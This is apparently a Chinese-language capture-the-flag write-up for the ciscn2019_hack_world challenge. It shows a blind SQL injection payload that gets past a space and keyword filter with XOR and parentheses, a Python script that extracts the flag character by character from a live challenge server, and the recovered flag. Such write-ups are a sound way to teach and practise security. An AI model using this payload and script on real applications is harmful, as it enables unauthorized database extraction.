ciscn2019_hack_world

(1)前言

好久没有做sql注入的题目了，找一道做一下

(2)题目

测试了一下应该是盲注，发现空格，and,&,|等一些常用的方法被过滤掉了，但是发现了我们可以用0^1或用if(1=1,1,1)这两种办法。

(3)构造payload，题目把表名和列名告诉我们了可以省的爆破。

payload = "0^(ascii((substr((select(flag)from(flag)),%d,1)))>%d)" % (i, mid)

不过由于是盲注，这就需要我们用到脚本

import requests
import time

flag = ""
for i in range(1, 60):
    high = 128
    low = 32
    mid = (high + low) >> 1
    while low < high:
        url = "http://1.14.71.254:28374/index.php"
        # payload = "0^(ascii((substr(database(),%d,1)))>%d)" % (i, mid)
        payload = "0^(ascii((substr((select(flag)from(flag)),%d,1)))>%d)" % (i, mid)
        data1 = {'id': payload}
        # print(url)
        r = requests.post(url, data=data1)
        # time.sleep(0.01)
        if "Hello" in r.text:
            low = mid + 1
        else:
            high = mid
        mid = (high + low) >> 1
    if mid == 32 or mid == 127:
        break
    flag += chr(mid)
    print(flag)
print("最终结果：" + flag)

爆出flag：NSSCTF{11f51a15-6faf-464d-87a4-d04097fd7b33}